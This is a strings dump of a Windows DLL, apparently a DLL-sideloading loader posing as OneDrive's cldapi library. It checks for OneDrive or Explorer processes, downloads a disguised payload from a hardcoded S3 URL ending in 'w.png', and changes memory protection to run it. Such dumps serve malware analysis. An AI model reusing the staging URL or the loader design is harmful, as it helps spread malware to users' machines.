!This program cannot be run in DOS mode.$
`.rdata
@.data
.pdata
@.00cfg
@.retplne
@.reloc
AVVWSH
)ffff.
HfF;TLTu
UAWAVATVWSH
"fffff.
[_^A\A^A_]
UAWAVATVWSH
[_^A\A^A_]
UAWAVATVWSH
UAWAVATVWSH
[_^A\A^A_]
UAWAVATVWSH
[_^A\A^A_]
UAWAVVWSH
[_^A^A_]
UAWAVVWSH
8[_^A^A_]
UAWAVVWSH
8[_^A^A_]
UAWAVVWSH
8[_^A^A_]
AWAVAUATVWUSH
uTHcF<
fffff.
([]_^A\A]A^A_
AWAVVWSH
am errorH
[_^A^A_
UAWAVATVWSH
`[_^A\A^A_]
UAWAVATVWSH
[_^A\A^A_]
AWAVVWSH
[_^A^A_
UAVVWSH
`[_^A^]
UAVVWSH
0[_^A^]
UAVVWSH
0[_^A^]
AWAVAUATVWUSH
([]_^A\A]A^A_
UAVVWSH
P[_^A^]
UAVVWSH
[_^A^]
UAVVWSH
[_^A^]
AVVWSH
([_^A^
AVVWSH
([_^A^
AWAVAUATVWSH
P[_^A\A]A^A_
AWAVATVWUSH
@[]_^A\A^A_
l$ VWATAUAVH
A^A]A\_^
UVWAVAWH
0A_A^_^]
x ATAVAWH
0A_A^A\
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
t$ UWAVH
taL9Chu
L90u$H
@SUVWAVH
A^_^][
x ATAVAWH
A_A^A\
f#D$@H
T$`A9r
|$ AVH
H;\$(u$H
|$ AVH
t$ WATAUAVAWH
A_A^A]A\_
|$ ATAVAWH
A_A^A\
k4+kPA+
|$P@8sTtm9sP~hL
|$X,GH
WAVAWH
S0HcC8H
A_A^_
|$ UATAUAVAWH
A_A^A]A\]
D9l$lu
u3HcH<H
l$ WATAVH
A^A\_
SVWATAUAVAWH
PA_A^A]A\_^[
PA_A^A]A\_^[
t$ AVH
d$@H9C tQH
G(H9C(tQH
G0H9C0tTH
G@H9C@tTH
GHH9CHtRH
t7A80u
D$ I;R
@SVWATAUAVAWH
|$hHcC
d$pfff
A_A^A]A\_^[
@SVWATAUAVAWH
D$@L9wXt
A_A^A]A\_^[
B(I9A(A
|$ AVH
|$ AVH
AUAVAWH
0A_A^A]
|$ AVH
@USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUH
\$h=RCC
A]A\_^[]
\$ WATAWH
0A_A\_
0A_A\_
gfffffffH
|$ AVH
|$ AVH
|$ AVHcA
@USVWAUAWH
A_A]_^[]
iostream stream error
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
`h````
xpxxxx
[aOni*{
~ $s%r
@b;zO]
v2!L.2
Failed to allocate memory
LdrFastFailInLoaderCallout
bad cast
ios_base::failbit set
ios_base::eofbit set
ios_base::badbit set
note process
Unknown exception
Failed to change memory protection
RtlLeaveCriticalSection
iostream
ntdll.dll
bad array new length
string too long
bad locale name
LdrGetDllFullName
Failed to allocate memory with VirtualAlloc
Error: %s
fwrite
fputwc
1#SNAN
1#QNAN
(null)
directory not empty
text file busy
device or resource busy
no such file or directory
not a directory
is a directory
AddDllDirectory
not enough memory
localeconv
stream timeout
timed out
invalid argument
connection reset
network reset
ios_base::failbit set
ios_base::eofbit set
ios_base::badbit set
not a socket
file exists
connection already in progress
operation in progress
no such device or address
bad address
no such process
no child process
CorExitProcess
success
too many symbolic link levels
too many links
no stream resources
resource deadlock would occur
bad file descriptor
executable format error
io error
unknown error
protocol error
network down
no protocol option
bad exception
inappropriate io control operation
bad allocation
argument out of domain
resource unavailable try again
too many files open
too many files open in system
read only file system
not a stream
no link
cross device link
invalid seek
operation would block
bad array new length
argument list too long
filename too long
message size
address in use
wrong protocol type
broken pipe
state not recoverable
address not available
no lock available
no message available
host unreachable
network unreachable
setlocale
value too large
file too large
result out of range
no message
bad message
illegal byte sequence
no space on device
no such device
no buffer space
identifier removed
operation not permitted
address family not supported
function not supported
operation not supported
protocol not supported
not supported
connection aborted
interrupted
already connected
not connected
connection refused
destination address required
operation canceled
permission denied
owner dead
nan(snan)
nan(ind)
NAN(SNAN)
NAN(IND)
\LLD PDB.
C:\Users\Lenovo\Desktop\XieBro-v3.3\x64\Release\cldapi.pdb
AcquireSRWLockExclusive
CloseHandle
CreateToolhelp32Snapshot
DecodePointer
DeleteCriticalSection
EncodePointer
EnterCriticalSection
ExitProcess
FormatMessageW
FreeLibrary
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetLastError
GetLocaleInfoEx
GetModuleHandleA
GetModuleHandleExW
GetModuleHandleW
GetProcAddress
GetStringTypeW
GetSystemTimeAsFileTime
InitializeCriticalSectionEx
InitializeSListHead
InterlockedFlushSList
IsDebuggerPresent
IsProcessorFeaturePresent
LCIDToLocaleName
LCMapStringEx
LeaveCriticalSection
LocalFree
MultiByteToWideChar
Process32FirstW
Process32NextW
QueryPerformanceCounter
RaiseException
ReleaseSRWLockExclusive
RtlCaptureContext
RtlLookupFunctionEntry
RtlUnwindEx
RtlVirtualUnwind
SetUnhandledExceptionFilter
SleepConditionVariableSRW
TerminateProcess
UnhandledExceptionFilter
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
WakeAllConditionVariable
WideCharToMultiByte
MessageBoxA
HttpQueryInfoW
InternetCloseHandle
InternetOpenUrlA
InternetOpenW
InternetReadFile
?terminate@@YAXXZ
_CxxThrowException
__C_specific_handler
__CppXcptFilter
__CxxFrameHandler3
__DestructExceptionObject
___lc_codepage_func
___lc_handle_func
___mb_cur_max_func
__getmainargs
__pctype_func
__uncaught_exception
_amsg_exit
_callnewh
_clearfp
_errno
_fileno
_fseeki64
_initterm
_initterm_e
_isatty
_local_unwind
_msize
_unlock
_wcsdup
calloc
fclose
fflush
fgetpos
fgetwc
fsetpos
malloc
memcpy
memmove
memset
perror
realloc
setvbuf
strchr
strcmp
strcpy_s
strlen
strnlen
strrchr
strtol
tolower
ungetc
ungetwc
wcslen
wcsnlen
wcsrchr
wctomb_s
KERNEL32.dll
USER32.dll
WININET.dll
msvcrt.dll
https://zn-download-2023.s3.amazonaws.com/ytr/w.png
.?AVfailure@ios_base@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AV_Iostream_error_category2@std@@
.?AVerror_category@std@@
.?AVbad_array_new_length@std@@
.?AVbad_alloc@std@@
.?AV?$ctype@_W@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AV_Facet_base@std@@
.?AU_Crt_new_delete@std@@
.?AVbad_cast@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVbad_exception@std@@
.?AVtype_info@@
.?AV_Locimp@locale@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_filebuf@_WU?$char_traits@_W@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@_WDU_Mbstatet@@@std@@
RetpolineV1
RetpolineV1
RetpolineV1
RetpolineV1
<?xml version="1.0" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
manifestVersion="1.0">
<trustInfo>
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false'/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
OneDriveStandaloneUpdater.exe
explorer.exe
OneDrive.exe
HTTP Example
Failed to get first process in the snapshot.
Failed to create snapshot of the processes.
Neither OneDrive, Explorer, nor OneDriveStandaloneUpdater is running. Exiting...
OneDriveStandaloneUpdater Running:
Explorer Running:
OneDrive Running:
msvcrt.dll
mscoree.dll
kernel32
advapi32
(null)